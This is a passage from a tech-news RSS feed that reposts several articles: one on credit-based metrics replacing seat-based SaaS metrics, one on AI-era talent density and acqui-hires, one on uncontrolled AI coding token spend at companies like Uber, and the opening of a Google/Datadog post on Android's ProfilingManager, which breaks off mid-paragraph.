<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to navigate the AI talent wars]]></title>
<description><![CDATA[Cloudflare recently beat Q1 2026 earnings. Revenue up 34% year over year. EPS ahead of consensus. Full-year guidance raised. Then, in the same breath, they announced 1,100 layoffs, 20% of the company. CEO Matthew Prince’s explanation: “The way we work at Cloudflare has fundamentally changed.”



...]]></description>
<link>https://tsecurity.de/de/3694394/it-security-nachrichten/how-to-navigate-the-ai-talent-wars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694394/it-security-nachrichten/how-to-navigate-the-ai-talent-wars/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-net-q1-earnings-revenues-230528107.html">Cloudflare recently beat Q1 2026 earnings</a>. Revenue up 34% year over year. EPS ahead of consensus. Full-year guidance raised. Then, in the same breath, they announced 1,100 layoffs, 20% of the company. CEO Matthew Prince’s explanation: “The way we work at Cloudflare has fundamentally changed.”</p>



<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/markets/stocks/articles/block-q1-earnings-beat-strong-144200216.html">Block did the same thing</a>. Beat guidance, raised outlook, cut 4,000+ jobs. Both framed it as architecting for the AI era.</p>



<p class="wp-block-paragraph">This is not a contradiction. This is the new math boards are running. And if you’re a CIO who hasn’t started running it yourself, <a href="mailto:https://www.cio.com/article/4077996/cios-be-ready-for-agentic-ai-or-be-out-of-a-job.html">you’re behind</a>.</p>



<h2 class="wp-block-heading">The benchmark has moved</h2>



<p class="wp-block-paragraph">AI-native companies have quietly reset what “efficient” means for a technology organization. Midjourney generates over $500M in revenue with roughly 160 employees, over $3M per head. Anthropic hit a $14B annualized run rate in early 2026 with fewer than 3,000 employees. Across the top AI-native startups, <a href="mailto:https://www.forbes.com/sites/paulbaier/2026/03/31/ai-native-firms-lead-in-revenue-per-employee/">the average revenue per employee is $3.48M</a>, nearly twelve times the traditional SaaS benchmark of $300K.</p>



<p class="wp-block-paragraph"><a href="mailto:https://www.saastr.com/what-to-do-if-your-business-decelerates/">Boards aren’t comparing you to your 2019 self anymore</a>. They’re comparing you to Anthropic.</p>



<p class="wp-block-paragraph">This is the pressure Cloudflare and Block are responding to. They’re not cutting people because the business is struggling. They’re cutting because investors have internalized a new denominator. Headcount is no longer a proxy for capacity; it’s a liability on the efficiency ratio.</p>



<p class="wp-block-paragraph">For CIOs, this creates a hiring problem that looks nothing like the cloud or mobile talent gaps of the past decade. Those gaps were about volume: hire 100 cloud engineers, absorb the cost, build the capability… This one is about density; you’re not looking for 100 people. You’re looking for 10 who can deliver what 100 couldn’t, and justify $1M or more in value per seat.</p>



<p class="wp-block-paragraph">Finding bodies to fill seats has never been easier. Finding people who operate at that level of leverage is a different problem entirely.</p>



<h2 class="wp-block-heading">‘Acqui-hires’ are a shortcut with a hidden cost</h2>



<p class="wp-block-paragraph">Companies have figured out that recruiting AI-native talent one by one is too slow and that it’s faster to buy a team. Google’s acquisition of the Windsurf founders, Meta bringing in the Scale AI team, Accenture’s string of AI-focused acquisitions: <a href="mailto:https://tomtunguz.com/ai-acqui-hire-wave/">these are acqui-hires</a> dressed up as M&amp;A. The premium on experienced AI talent is high enough, and the urgency real enough, that organizations are skipping traditional hiring loops entirely and buying their way in.</p>



<p class="wp-block-paragraph">I’ve been on the other side of this. My company, MadKudu, was acquired by HG Insights specifically to bring AI-native capability into an established enterprise business. HG needed change agents who had already figured out how to build and ship in this new era, not just people who’d read about it. That’s the thesis behind most of these deals.</p>



<p class="wp-block-paragraph">But there’s a cost that doesn’t show up in the acquisition price.</p>



<p class="wp-block-paragraph">AI-native teams are fast because they operate with a different set of defaults: full access to tools, minimal governance layers, the ability to experiment and ship without a six-week approval cycle. That operating model is not a perk; it’s the fundamental mechanism. It’s why a team of 10 can do what an enterprise team of 100 can’t.</p>



<p class="wp-block-paragraph">When you acqui-hire that team and then slot them into your existing approval processes, you’ve bought the people and killed the engine. The change agents you paid for become change-frustrated. The attrition that follows is expensive and predictable.</p>



<p class="wp-block-paragraph">The harder realization: acquiring an AI-native team means accepting how they work. That requires deliberately carving out space for them to operate differently, not just tolerating it but institutionalizing it. The acquisition is an organizational change program, not just a hiring event.</p>



<h2 class="wp-block-heading">The CIO’s real problem</h2>



<p class="wp-block-paragraph">The governance stack most enterprise organizations run was designed for a headcount world. Every tool vetting cycle, every vendor review, every security approval was calibrated assuming you were managing a large team where consistency and control were the primary objectives.</p>



<p class="wp-block-paragraph">That calculus breaks when your goal is talent density. The same approval processes that protect against data leaks are now the reason your best people can’t do their best work. When it takes six weeks to approve a tool that your competitor’s team is already shipping with, you’ve traded velocity for the perception of safety.</p>



<p class="wp-block-paragraph">The practical fix is structured experimentation: clear guardrails, defined boundaries, but explicit permission to try tools before deciding whether to roll them out broadly. Gating everything prevents you from ever discovering what 10x productivity looks like.</p>



<p class="wp-block-paragraph">The skills inventory question is also more nuanced than it sounds. Job titles won’t tell you where the leverage is. You need to map the actual tasks within each function and assess which can be automated or augmented with AI. That’s where you find the people who, with the right tools, become your $1M/employee talent, not because you hired differently, but because you enabled better.</p>



<p class="wp-block-paragraph">This is also where the build-versus-buy question gets genuinely tricky. As AI reshapes how products are built and delivered, your internal operating model — how you work, how fast you ship, how you use data — is becoming core IP. Outsourcing delivery means outsourcing the part of the organization where your competitive advantage is now being built.</p>



<h2 class="wp-block-heading">Closing the gap without slowing down</h2>



<p class="wp-block-paragraph"><a href="mailto:https://www.saastr.com/the-great-ai-talent-grab-the-latest-20vc-with-jason-harry-and-rory/">The AI talent wars</a> are not primarily a recruiting problem. They’re a rethinking of what organizations are supposed to look like.</p>



<p class="wp-block-paragraph">Boards have a new benchmark. Cloudflare, Block, Amazon, Meta and others have already started restructuring to meet it, publicly, painfully, even while beating their numbers. The question for CIOs isn’t whether this pressure arrives; it’s whether you’re ahead of it or behind it when it does.</p>



<p class="wp-block-paragraph">The organizations that navigate this well won’t win by outbidding competitors for a handful of elite engineers. They’ll win by designing operating systems that amplify the leverage of the talent they do have, by enabling their best people rather than constraining them, and by treating AI fluency as a core organizational capability rather than a niche specialization.</p>



<p class="wp-block-paragraph">Talent density is the new headcount model. The sooner your governance, your tooling and your board conversations reflect that, the better positioned you’ll be when the next efficiency report lands.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Datadog delivers millions of in-depth performance insights with ProfilingManager]]></title>
<description><![CDATA[Posted by Alice Yuan, Developer Relations Engineer at Google, Arti Arutiunov, Product Manager at Datadog and Nikita Ogorodnikov, Staff Software Engineer at Datadog


  Performance regressions are notoriously hard to reproduce, making regressions a massive bottleneck for mobile developers. Althoug...]]></description>
<link>https://tsecurity.de/de/3693507/android-tipps/datadog-delivers-millions-of-in-depth-performance-insights-with-profilingmanager/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693507/android-tipps/datadog-delivers-millions-of-in-depth-performance-insights-with-profilingmanager/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:39 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/a/AVvXsEh92CmF7Hos-AKsEmr3k9Va10fhbed32pj4r9wxbUAlpyAIh2GV0KhvsRYzkmATQgflpHYdfAgdFkRfq1ki2G7ty5wKfzoaoyYknCOEjb6Auz7r0Zcfk0tR6VCX-3o3L9fpcs419uI5iNdBiOtno7ughGWD0SGJ5n3sfWPEB7ZJ9M_HQFDLhBQ_hv3HFQ8">
<p>Posted by Alice Yuan, Developer Relations Engineer at Google, Arti Arutiunov, Product Manager at Datadog and Nikita Ogorodnikov, Staff Software Engineer at Datadog</p><p></p><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjICmOZHTF4gmgXj1G4r5Fp48jM_W4fN9tjxbdnesvaxjUsuwmrftmILW-CErt5cXGcZp93UGtLy8fBehhZxwZ2oxtjQLNb269jHfkNA3XBHnn9JIVZbApeatdCi9gX6ylK7-5A-DzQ3VSRi8hJCNp_8699CzeD9H0y26Tl-6DO8FIafh9UQFyrpa_C9DA"><img alt="" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/a/AVvXsEjICmOZHTF4gmgXj1G4r5Fp48jM_W4fN9tjxbdnesvaxjUsuwmrftmILW-CErt5cXGcZp93UGtLy8fBehhZxwZ2oxtjQLNb269jHfkNA3XBHnn9JIVZbApeatdCi9gX6ylK7-5A-DzQ3VSRi8hJCNp_8699CzeD9H0y26Tl-6DO8FIafh9UQFyrpa_C9DA=s16000"></a></div><br><br><p></p>

<p>
  Performance regressions are notoriously hard to reproduce, making regressions a massive bottleneck for mobile developers. Although signals like ANR rates indicate what issues occur in production, pinpointing the specific line of code that resulted in the performance issue has historically necessitated exhaustive manual reproduction or speculative trial-and-error experimentation.
</p>

<p>Datadog collaborated with Google to mitigate this frustration by integrating the ProfilingManager API (available on Android 15+ devices) into its Real User Monitoring (RUM) and Continuous Profiling platforms. This integration transforms the debugging workflow, allowing developers to move beyond surface-level symptoms to being able to detect the <em>why</em> behind a performance bottleneck.
</p>

By leveraging this system-level API, Datadog now processes millions of production profiles weekly across the globe according to Datadog internal data of June 2026. It provides engineering teams with a new level of visibility into real-world performance, all while maintaining a low runtime overhead for production-scale performance monitoring.

<h3>The impact of ProfilingManager</h3><p>
  ProfilingManager is a system service introduced in Android 15 that enables apps to programmatically collect performance data such as call stack samples, field traces and memory heap dumps directly from production environments. This capability shifts the engineering paradigm from reactive manual reproduction to proactive field analysis.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVOhdnTTwX9DT3ROPHDLHKm1aJ8Z0vo5wYsHTULe7oRBqsi2-pTblEC1ggNuVXdd5rCZv6RooG4dsdOqMM_8URLUxierH3KjujbTyVSFrqNIs01zMqb_o7uXFeYECms5s_CkX1WvAPaQeO5W9bpnvD4S4BNN0mH9qbanuTukvCg8LTozhNEhY0CQ0o0Q/s1280/AANDDM_DataDog_Quote_01.png"><img alt="ProfilingManager is a highly performant solution for code-level insights.  Of the solutions we evaluated, it has the lowest runtime overhead,  gives deep visibility into Java, Kotlin, and C++ traces, and opens the door to gather memory profiles and system-level traces during critical moments like ANRs and out-of-memory (OOM) errors. Yi Lu, Senior Engineer at Datadog" border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVOhdnTTwX9DT3ROPHDLHKm1aJ8Z0vo5wYsHTULe7oRBqsi2-pTblEC1ggNuVXdd5rCZv6RooG4dsdOqMM_8URLUxierH3KjujbTyVSFrqNIs01zMqb_o7uXFeYECms5s_CkX1WvAPaQeO5W9bpnvD4S4BNN0mH9qbanuTukvCg8LTozhNEhY0CQ0o0Q/s16000/AANDDM_DataDog_Quote_01.png"></a></div><br><p><br></p>

For example, a Google communications app used field traces to investigate why its cold start times were slower on newer, more powerful hardware. By diving into the field-collected traces and comparing traces across different device types, the engineer discovered a hidden scheduling issue: a background text-to-speech service was unnecessarily being prewarmed during app startup. The traces revealed that this background process was monopolizing the device's highest-performing big CPU core, forcing the app's main thread to sleep while the prewarm occurred.

<h3>Solving the Android code-level visibility challenge</h3><p>
  Prior to the implementation of ProfilingManager, Datadog’s Real User Monitoring (RUM) focused on high-level application health and session-level telemetry to assess the user journey. Engineering teams could monitor Android performance signals like time to initial display, ANR rates, CPU load, and frozen frames. These insights extended to granular interactions, such as network latency, touch events, and main thread hangs. However, while this data effectively highlighted which performance bottlenecks were surfacing in the field, it provided no clear path to identifying the root cause of these failures.</p><div><span face='"Google Sans", sans-serif'><br></span></div><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjW4Lm-zE5X2trjidQ0eh9i_Bhiwd7HnkOcMeRtA_4dABpGG0EPuer564cLFK4o3eb_N_zWmBAgpOa58eygLH5hwFF6kMg_4GFC98vRN4pd1LNZ-PG9W5wyHv-ptVcmIGo1M7FNPi9PKQ9iGsyZeVfr5jDK46HJHU-1Gsc6IZJdSvhrZVavqKiZmyYar0o"><img alt="We realized that across our profiling features, performance profiling on mobile applications remained a blind spot. Teams could see that an Android user experienced a slow screen render or an ANR, but lacked the same code-level visibility they relied on for their backend services. - Bryan Antigua, Senior Product Manager at Datadog" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/a/AVvXsEjW4Lm-zE5X2trjidQ0eh9i_Bhiwd7HnkOcMeRtA_4dABpGG0EPuer564cLFK4o3eb_N_zWmBAgpOa58eygLH5hwFF6kMg_4GFC98vRN4pd1LNZ-PG9W5wyHv-ptVcmIGo1M7FNPi9PKQ9iGsyZeVfr5jDK46HJHU-1Gsc6IZJdSvhrZVavqKiZmyYar0o=s16000"></a></div><br><br><p></p>

<p>
  To address this, Datadog needed a profiling engine capable of capturing Android traces directly from devices in production with minimal performance impact. After evaluating alternative approaches, such as writing their own trace processor using Android Debug APIs, the team selected ProfilingManager because it is the most performant solution of the profiling options they evaluated and offloads the sampling decisions overhead to the OS.
</p>

<p>
